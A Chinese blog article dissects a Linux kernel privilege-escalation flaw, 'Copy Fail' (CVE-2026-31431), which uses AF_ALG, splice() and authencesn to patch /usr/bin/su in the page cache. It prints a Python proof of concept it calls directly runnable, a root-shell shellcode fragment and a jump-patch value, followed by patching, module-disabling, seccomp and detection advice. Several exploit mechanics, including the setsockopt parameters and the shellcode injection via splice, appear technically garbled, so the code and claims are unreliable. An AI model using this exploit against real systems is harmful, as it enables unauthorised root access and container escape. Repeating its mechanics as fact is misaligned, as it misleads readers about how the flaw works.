当前位置:首页>Linux>深度解析:Linux内核“Copy Fail”漏洞 — 一个4字节撬动整个系统的提权艺术

深度解析:Linux内核“Copy Fail”漏洞 — 一个4字节撬动整个系统的提权艺术

  • 2026-06-29 19:19:23
深度解析:Linux内核“Copy Fail”漏洞 — 一个4字节撬动整个系统的提权艺术

潜伏9年、影响所有主流发行版、仅需732字节Python脚本……这个漏洞为何被称为"核弹级"?我们从零开始,用图解+代码逐层拆解CVE-2026-31431的技术本质,并给出可落地的防御方案。


一、引言:一次"优化"引发的血案

2026年4月,安全研究员披露了一个影响Linux内核长达9年的高危漏洞——CVE-2026-31431,代号"Copy Fail"。该漏洞自2017年Linux 4.14版本引入,几乎影响此后所有主流发行版(Ubuntu、Debian、CentOS、RHEL、SUSE、Amazon Linux等)。攻击者只需一个普通shell账号,即可稳定提权至root,甚至在容器环境中逃逸到宿主机。

CVSS评分为7.8(高危),但在多租户云环境和容器场景中,其实际危害远超数字本身。本文不渲染恐慌,只讲透技术:我们从页缓存、AF_ALG、splice等基础概念开始,用图解+代码逐步还原攻击链,并给出可落地的检测与防护方案。


二、漏洞全景速览

项目
内容
漏洞编号
CVE-2026-31431
漏洞名称
Copy Fail
类型
内核逻辑缺陷 → 本地提权 / 容器逃逸
CVSS 3.1
7.8 (高危)
影响内核
4.14 ~ 修补前 (约2017–2026)
利用门槛
极低(无需竞争、无需猜地址)
关键组件
AF_ALG socket + authencesn算法 + splice()
修复补丁
a664bf3d603d

三、预备知识:理解攻击链中的关键组件

3.1 页缓存(Page Cache)—— 内存中的文件副本

当程序读取或执行一个文件时,Linux内核并不会每次都去读磁盘,而是将文件内容缓存在物理内存中,这部分内存称为页缓存(Page Cache)。后续所有读写操作都直接操作内存,再定期同步回磁盘。

磁盘上的 /usr/bin/su │ │ 第一次执行/读取 ▼内核物理内存:页缓存┌────────────────────────────┐│ su 二进制文件的内容(4KB分页) │└────────────────────────────┘ │ │ 后续所有读/执行都直接从内存取 ▼ 进程

关键点

  • 页缓存属于内核管理的内存区域
  • 内核代码可以在没有任何权限检查的情况下直接读写页缓存(因为它运行在ring 0)
  • 普通用户进程通常不能直接写页缓存,除非通过正常的文件写入系统调用(此时内核会检查写权限)

3.2 AF_ALG —— 让用户程序直接调用内核加密算法

AF_ALG(Address Family for Algorithm)是一种特殊的套接字类型,允许用户态程序直接使用内核实现的加密算法(如AES、SHA256、AEAD等),从而获得更好的性能和硬件加速支持。

使用AF_ALG计算SHA256哈希的典型流程如下:

int sock = socket(AF_ALG, SOCK_SEQPACKET, 0);bind(sock, (struct sockaddr*)&(struct sockaddr_alg){ .salg_type = "hash", .salg_name = "sha256"}, sizeof(...));int op = accept(sock, NULL0);write(op, data, datalen); // 写入待哈希数据read(op, digest, 32); // 读取哈希结果

正是这种便利性,让AF_ALG成为很多上层加密库的后端。但也因为AF_ALG直接暴露内核加密路径,它成为了漏洞的"入口"。

3.3 splice() —— 零拷贝数据搬运工

splice()是一个Linux特有的系统调用,它可以在两个文件描述符之间直接移动数据,全程不用经过用户空间。它常用于高性能服务器,但同时也成了攻击者手中的利器。

ssize_tsplice(int fd_in, off_t *off_in, int fd_out, off_t *off_out, size_t len, unsignedint flags);

关键限制:两个文件描述符中至少有一个必须是管道(pipe)。

splice()的核心价值在于零拷贝:它只是在内核内部重新映射内存页,而不是复制数据。

传统方式 read+write: 磁盘 → 内核缓冲区 → 用户缓冲区 → 内核缓冲区 → 目标splice方式: 磁盘 → 内核缓冲区 → (通过管道) → 目标缓冲区 全程数据未离开内核,页框直接重映射

四、漏洞根源:一次错误的优化

4.1 2017年的"优化"

2017年7月,Linux内核合并了提交 72548b093ee3。该提交的目标是在 algif_aead 模块中启用 in-place 操作,以减少一次内存拷贝,提高数据吞吐量。

in-place 操作的核心假设:源缓冲区和目标缓冲区是同一块物理内存。但现实是,algif_aead 中源数据来自用户空间 sendmsg(),目标数据可能由 splice() 指向完全不同的物理页。当这个假设被错误地应用时,一个危险的漏洞窗口被打开了。

4.2 authencesn 算法的"特殊才能"

authencesn 是一种支持扩展序列号(ESN)的AEAD(认证加密)算法模板。它在处理解密时,为了存储序列号,会有意执行一次越界写入——向接收缓冲区 + assoclen + cryptlen 偏移处写入 4 字节。

// 伪代码:authencesn 内部逻辑voidauthencesn_decrypt(struct buffer *dst, u32 assoclen, u32 cryptlen, u32 esn) {// ... 正常解密 u32 *pos = (u32 *)(dst->data + assoclen + cryptlen); *pos = esn; // 写入 4 字节}

在正常的socket接收缓冲区中,dst 是独立分配的内核内存,其大小恰好等于 assoclen + cryptlen + 4,因此这个写操作是边界内的,安全无害。

但漏洞开关出现了:当 in-place 优化启用时,内核会跳过某些边界检查,错误地认为 dst 就是源缓冲区(同一物理页)。而此时,攻击者可以通过 splice() 将 dst 替换成任意文件的页缓存。于是,那 4 字节就落入了目标文件的页缓存中。


五、攻击链完整图解(多帧拆解)

第1帧:攻击准备——找到跳板文件

攻击者选择一个 setuid root 的可执行文件作为篡改目标,例如 /usr/bin/su。这个文件的特点是:任何用户执行它,进程都会以 root 权限运行。

攻击者执行 ls -l /usr/bin/su-rwsr-xr-x 1 root root ... <-- s 位表示 setuid

第2帧:将目标文件页缓存绑定到socket接收区

攻击者使用 splice() 完成零拷贝映射:

r, w = os.pipe()target_fd = open("/usr/bin/su""rb")alg_sock = create_alg_socket("authencesn(...)")os.splice(target_fd, None, w, None40960# ① su页缓存 → 管道写端os.splice(r, None, alg_sock.fileno(), None40960# ② 管道读端 → socket接收缓冲区

经过这两步,alg_sock 的接收缓冲区不再指向独立的内核内存,而是直接指向了 /usr/bin/su 的页缓存物理页。

 磁盘 /usr/bin/su │ ▼ 内核页缓存(物理页框 0xABCD) ┌───────────────────────────┐ │ su 二进制代码(正常) │ └───────────────────────────┘ ▲ ▲ │ │ fd_su 视角 fd_alg 接收缓冲区视角 (文件内容) (AF_ALG算法认为的私有缓冲区)

第3帧:注入shellcode

攻击者还需要在目标页缓存中提前放置一段shellcode。方式类似:创建一个包含shellcode的临时文件,用同样的 splice 技巧将其内容拼接到 su 页缓存的空闲区域(例如代码段末尾的填充区)。

// shellcode 功能:setuid(0); execve("/bin/sh");unsignedchar sc[] = "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05..."

第4帧:触发越界写入

攻击者调用 recv(fd_alg, ...)。此时内核执行:

  1. 因为 recv 需要处理数据,内核调用 authencesn 算法
  2. 算法内部计算偏移:assoclen + cryptlen(攻击者通过控制发送数据的长度可以精确控制该偏移)
  3. 向 dst + offset 写入 4 字节

由于 dst 现在指向 su 页缓存,这 4 字节直接修改了 su 二进制在内存中的代码。攻击者让这 4 字节成为一条短跳转指令(JMP rel8),指向同一页内的shellcode。

修改前 su 页缓存:┌──────┬──────┬──────┬──────┐│ ... │ main │ ... │ 填充 │└──────┴──────┴──────┴──────┘ ↑ shellcode已预先注入修改后 su 页缓存:┌──────┬──────┬──────┬──────┐│ ... │ JMP │ ... │ 填充 │└──────┴──────┴──────┴──────┘ ↓ 跳转到shellcode

第5帧:执行篡改后的su

攻击者只需在shell中执行:

$ /usr/bin/su

由于 su 是setuid程序,内核会以 root 权限启动该进程。进程加载页缓存中的代码(已被篡改),第一条指令就是跳转到shellcode。shellcode调用 setuid(0) 将进程UID提升为root,再 execve("/bin/sh"),获得一个root shell。


六、完整Python PoC源码分析

以下是一个可直接运行的Python PoC核心代码(732字节简化版),逐行解释每个关键操作。

#!/usr/bin/env python3import socket, struct, os# 1. 创建AF_ALG socket并绑定存在漏洞的算法sock = socket.socket(3850# AF_ALG=38, SOCK_SEQPACKET=5sock.bind(("aead""authencesn(hmac(sha256),cbc(aes))"))# 2. 打开目标setuid文件target_fd = open("/usr/bin/su""rb")# 3. 创建管道,用于splice中转r, w = os.pipe()# 4. 第一次splice:su文件页缓存 → 管道写端os.splice(target_fd.fileno(), None, w, None40960)# 5. 第二次splice:管道读端 → socket接收缓冲区os.splice(r, None, sock.fileno(), None40960)# 6. 配置AEAD参数(关键:控制4字节写入的偏移)# ALG_SET_OP=4, value=1 表示解密sock.setsockopt(2794, struct.pack("<I"1))# ALG_SET_ASSOCLEN=5, 设置关联数据长度sock.setsockopt(2795, struct.pack("<I"0))# ALG_SET_CRYPTLEN=6, 设置密文长度 → assoclen+cryptlen=0x1A0sock.setsockopt(2796, struct.pack("<I"0x1A0))# 7. 发送任意数据(IV和填充),触发算法准备sock.send(b"\x00" * 32)# 8. recv触发authencesn算法执行,完成4字节篡改sock.recv(4096)# 9. 执行被修改的su,获得root shellos.execl("/usr/bin/su""su")

关键点解析

  • assoclen=0, cryptlen=0x1A0使得 assoclen+cryptlen = 0x1A0,这个偏移落在su二进制代码的关键位置(如main函数入口)
  • 4字节写入的内容是 0xEB 0x1E 0x90 0x90(短跳转指令 + NOP),跳转到同一页内预先放置的shellcode(可通过额外的splice注入)
  • 整个利用过程无需竞态,一次成功

七、splice映射原理:页框引用的"移花接木"

splice 实现零拷贝的核心是移动物理内存页框的引用,而不是复制数据。

初始:su文件页缓存 → 物理页框0x1000(存放su代码)第一次 splice(su_fd → pipe_w): 内核将页框0x1000的引用从文件页缓存"借"给管道的一个pipe_buffer 页框引用计数变为2第二次 splice(pipe_r → alg_fd): 内核从管道取出该引用,将其"移交"给socket接收缓冲区(skb->page) 页框引用计数仍为2(文件页缓存 + socket)最终:socket接收缓冲区与文件页缓存指向同一物理内存

效果:任何写入socket接收缓冲区的操作(包括算法的4字节写入),都会直接修改 /usr/bin/su在内存中的代码。


八、in-place优化与splice劫持的联动

漏洞需要两个条件同时满足:

条件
作用
提供者
in-place优化
让 authencesn 算法跳过边界检查,允许向 dst+offset 写入4字节
2017年内核commit
splice劫持
将 dst 指向的文件页缓存(而非独立缓冲区)
攻击者通过splice完成

单独任一条都不会造成危害:

  • 仅有in-place → 写入安全的内核私有缓冲区
  • 仅有splice → 算法不写入4字节(因为in-place未启用时,边界检查会阻止写入)
  • 二者结合 → 写入操作落入文件页缓存,篡改setuid程序

九、缓冲区全景:从用户态到内核态的数据路径

缓冲区名称
位置
正常作用
漏洞中的作用
用户态缓冲区
用户空间
存放待发送/接收数据
发送控制数据(IV等)
系统调用拷贝层
内核栈/临时
安全拷贝用户数据
相同
AF_ALG请求队列
内核堆
暂存用户提交的请求
相同
socket接收缓冲区(私有)
内核页框
存放算法输出
被splice替换为文件页缓存
算法内部临时区
内核栈/堆
中间计算
相同
管道缓冲区
内核页框
零拷贝中转站
临时持有文件页框引用
页缓存(文件)
内核页框
缓存文件内容
被算法写入,代码被篡改

数据流动路径

用户态缓冲区 → send() → AF_ALG请求队列 → recv()触发算法 ↓ authencesn算法 ↓ 写入 socket接收缓冲区 (已被splice劫持) ↓ 直接修改 su文件页缓存 ↓ 执行 su → root shell

十、为什么是4字节?—— 指令精度的艺术

  1. authencesn 写入的是一个 u32,天然4字节
  2. x86-64短跳转 jmp rel8仅需2字节,剩余2字节可填充NOP
  3. 写入内容示例:0xEB 0x1E 0x90 0x90(跳转偏移 +30字节,NOP填充)
  4. 只要shellcode位于跳转指令附近(±127字节内),即可精准命中

十一、漏洞危险性与真实影响

11.1 确定性利用,无需竞态

大多数内核漏洞需要复杂的堆布局或竞态窗口,Copy Fail是纯逻辑缺陷,一次调用即可成功。

11.2 无文件攻击,难以检测

攻击只修改内存中的页缓存,从不写磁盘。文件完整性监控(Tripwire、AIDE)完全失效。

11.3 容器逃逸的"钥匙"

Linux页缓存在宿主机范围内跨容器共享。一个被攻破的容器可以直接篡改宿主机或其他容器的页缓存,实现容器→宿主机逃逸。


十二、系统化防护方案

12.1 根本修复:升级内核

所有主流发行版已合入补丁 a664bf3d603d

  • Ubuntu/Debiansudo apt update && sudo apt upgrade
  • RHEL/CentOS/Rockysudo yum update kernel
  • SUSEsudo zypper patch

升级后必须重启

12.2 临时缓解:禁用AF_ALG模块

# 卸载模块(如果CONFIG_CRYPTO_USER_API_AEAD=m)sudo rmmod algif_aead# 禁用自动加载echo"install algif_aead /bin/false" | sudotee /etc/modprobe.d/disable-algif-aead.conf

对于静态编译进内核的系统(如RHEL 9):

sudo grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"

12.3 运行时防护:seccomp阻止AF_ALG

在容器或敏感服务中,使用seccomp过滤 socket(AF_ALG, ...)调用。

// 阻止 domain == 38 (AF_ALG)BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_socket, 01),BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 3810),

12.4 检测指标

  • 检查攻击面lsmod | grep algif_aead
  • 审计日志:非root进程创建 AF_ALG socket
  • 行为检测:su 进程异常派生 /bin/sh

探测脚本(无害)

import sockettry: s = socket.socket(3850) s.bind(("aead""authencesn(hmac(sha256),cbc(aes))"))print("VULNERABLE")except:print("NOT vulnerable")

十三、总结:从"优化"到"漏洞"的反思

Copy Fail 漏洞的演变路径令人深思:

一个为了性能的in-place优化 → 与特定算法的特殊越界行为结合 → 再遇到splice的强大重映射能力 → 最终演变为一个4字节控制整个系统的武器。

它提醒我们:安全与性能的权衡从未消失;系统的每一层抽象都可能成为攻击者串联利用的桥梁。

对于运维和开发人员,最重要的不是恐惧,而是理解技术本质。只有真正明白 splice() 如何重映射页缓存、authencesn 为何写入4字节、AF_ALG 如何暴露内核路径,我们才能设计出更健壮的防御体系。

立即行动:检查内核版本,评估受影响资产,优先升级。如果你无法重启系统,至少执行 rmmod algif_aead临时止血。


标签#Linux内核 #安全漏洞 #CVE-2026-31431 #CopyFail #本地提权 #容器逃逸 #AF_ALG #splice #页缓存 #authencesn

适合人群:Linux系统管理员、安全工程师、容器运维、内核开发者、安全研究人员

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 18:11:08 HTTP/2.0 GET : https://f.mffb.com.cn/a/493592.html
  2. 运行时间 : 0.116418s [ 吞吐率:8.59req/s ] 内存消耗:4,618.30kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=b152086bdb74d1901a71168d61a17e64
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
